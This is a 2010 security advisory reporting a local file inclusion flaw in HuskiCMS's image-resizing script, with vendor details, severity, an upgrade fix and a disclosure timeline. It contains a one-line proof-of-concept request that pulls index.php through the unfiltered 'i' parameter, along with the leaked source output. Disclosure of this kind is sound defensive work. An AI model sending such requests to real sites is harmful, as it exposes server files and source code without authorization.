-------------------------------------------------------------------------------------------- 20100205 - Justanotherhacker.com : HuskiCMS local file inclusion JAHx102 - http://www.justanotherhacker.com/advisories/JAHx102.txt -------------------------------------------------------------------------------------------- HuskiCMS huski CMS effectively places the control of the website back into the hands of you, the site owner. huski CMS is extremely user friendly and has been developed with the lowest denominator in IT knowledge in mind. huski CMS is still a very powerful and flexible system which ensures your site is using the latest technologies such as AJAX, XML, XHTML, and CSS [ Taken from: http://www.huskicms.com ] --- Vulnerability description --- A conditional local file inclusion exists in the image resizing script size.php's i parameter. The parameter is not filtered and allows arbitrary file inclusion. Discovered by: Eldar "Wireghoul" Marcussen Type: Local File Inclusion Severity: Low Release: Responsible CVE: None Vendor: ASCET Interactive - http://www.ascetinteractive.com Affected versions: Unknown --- Proof of Concept --- ~$ GET 'http://[target]/size.php?i=index.php' loadPluginSources(); // Create the Page $page->createPage(); echo $page->Result; ?> --- Solution --- Upgrade to a more recent version --- Disclosure time line --- 05-Feb-2010 - Public disclosure 29-Jan-2010 - Vendor acknowledge vulnerability 28-Jan-2010 - Vendor notified through email